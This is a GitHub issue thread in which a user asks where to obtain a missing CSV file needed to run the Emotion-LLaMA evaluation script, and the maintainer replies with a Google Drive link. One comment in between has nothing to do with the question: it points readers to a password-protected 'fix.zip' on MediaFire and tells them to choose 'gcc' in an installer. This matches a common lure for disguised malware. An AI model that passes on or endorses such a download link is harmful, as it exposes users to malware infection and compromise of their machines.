### ISSUE TITLE
How to get 'transcription_en_all.csv'

### ISSUE THREAD

**Issue by lvbubu** [ZebangCheng/Emotion-LLaMA#9]
hello author,  when I try to evaluate on MER2023 following the script 'torchrun --nproc_per_node 1 eval_emotion.py --cfg-path eval_configs/eval_emotion.yaml --dataset feature_face_caption'. I failed with missing 'transcription_en_all.csv'.
So I wonder how can I get it.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZebangCheng** [comment]
'transcription_en_all.csv' google drive link as:

https://drive.google.com/file/d/19Pc2YiPnIhcePISUrI313hUYEzXJH41o/view?usp=sharing
